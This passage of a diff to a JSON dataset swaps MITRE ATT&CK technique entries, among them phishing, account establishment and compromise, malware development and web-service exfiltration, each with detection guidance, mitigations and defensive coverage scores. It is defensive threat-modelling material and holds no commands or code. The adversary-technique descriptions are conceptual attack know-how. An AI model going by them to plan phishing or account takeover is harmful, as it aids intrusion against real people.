         ],
-        "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
-            "AC-20",
-            "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "CM-8",
-            "CP-10",
-            "CP-6",
-            "CP-7",
-            "CP-9",
-            "SC-28",
-            "SC-36",
-            "SC-4",
-            "SC-46",
-            "SC-7",
-            "SI-12",
-            "SI-16",
-            "SI-23",
-            "SI-4",
-            "SI-7"
+        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+        "platforms": [
+            "PRE"
         ],
-        "process_coverage": true,
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Persona: Social Media"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1585",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
         "network_coverage": true,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.4285714285714286,
-            "mitigation_score": 0.7636363636363637,
-            "detection_score": 0.06
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.0006346
+        "hardware_coverage": false
     },
     {
-        "tid": "T1566",
-        "name": "Phishing",
-        "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.",
-        "url": "https://attack.mitre.org/techniques/T1566",
+        "tid": "T1585.002",
+        "name": "Establish Accounts: Email Accounts",
+        "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)",
+        "url": "https://attack.mitre.org/techniques/T1585/002",
         "tactics": [
-            "Initial Access"
+            "Resource Development"
         ],
-        "detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
         "platforms": [
-            "Google Workspace",
-            "Linux",
-            "Office 365",
-            "SaaS",
-            "Windows",
-            "macOS"
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1585",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1586",
+        "name": "Compromise Accounts",
+        "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
+        "url": "https://attack.mitre.org/techniques/T1586",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "platforms": [
+            "PRE"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "File: File Creation",
             "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Persona: Social Media"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1566.001",
-                "name": "Phishing: Spearphishing Attachment",
-                "url": "https://attack.mitre.org/techniques/T1566/001",
-                "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
-                "detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)",
-                "mitigations": [
-                    {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
-            {
-                "tid": "T1566.002",
-                "name": "Phishing: Spearphishing Link",
-                "url": "https://attack.mitre.org/techniques/T1566/002",
-                "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
-                "detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
+                "tid": "T1586.001",
+                "name": "Compromise Accounts: Social Media Accounts",
+                "url": "https://attack.mitre.org/techniques/T1586/001",
+                "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+                "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
                 "mitigations": [
                     {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1566.003",
-                "name": "Phishing: Spearphishing via Service",
-                "url": "https://attack.mitre.org/techniques/T1566/003",
-                "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.",
-                "detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
+                "tid": "T1586.002",
+                "name": "Compromise Accounts: Email Accounts",
+                "url": "https://attack.mitre.org/techniques/T1586/002",
+                "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
                 "mitigations": [
                     {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1049",
-                "name": "Antivirus/Antimalware",
-                "description": "Use signatures or heuristics to detect malicious software.",
-                "url": "https://attack.mitre.org/mitigations/M1049"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
-            },
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1586.001",
+        "name": "Compromise Accounts: Social Media Accounts",
+        "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+        "url": "https://attack.mitre.org/techniques/T1586/001",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Persona: Social Media"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1586",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
-            },
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1586.002",
+        "name": "Compromise Accounts: Email Accounts",
+        "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
+        "url": "https://attack.mitre.org/techniques/T1586/002",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1586",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.590328371904762,
-        "adjusted_score": 0.590328371904762,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "2.3",
-            "2.7",
-            "9.3",
-            "9.6",
-            "13.3",
-            "13.8",
-            "14.1",
-            "14.2",
-            "14.6"
-        ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "IA-9",
-            "SC-20",
-            "SC-44",
-            "SC-7",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-8"
-        ],
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.46190476190476193,
-            "mitigation_score": 0.38181818181818183,
-            "detection_score": 0.55
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.02842361
+        "hardware_coverage": false
     },
     {
-        "tid": "T1567",
-        "name": "Exfiltration Over Web Service",
-        "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
-        "url": "https://attack.mitre.org/techniques/T1567",
+        "tid": "T1587",
+        "name": "Develop Capabilities",
+        "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.",
+        "url": "https://attack.mitre.org/techniques/T1587",
         "tactics": [
-            "Exfiltration"
+            "Resource Development"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+        "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Internet Scan: Response Content",
+            "Malware Repository: Malware Content",
+            "Malware Repository: Malware Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1567.001",
-                "name": "Exfiltration Over Web Service: Exfiltration to Code Repository",
-                "url": "https://attack.mitre.org/techniques/T1567/001",
-                "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+                "tid": "T1587.001",
+                "name": "Develop Capabilities: Malware",
+                "url": "https://attack.mitre.org/techniques/T1587/001",
+                "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",
+                "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
                 "mitigations": [
                     {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1567.002",
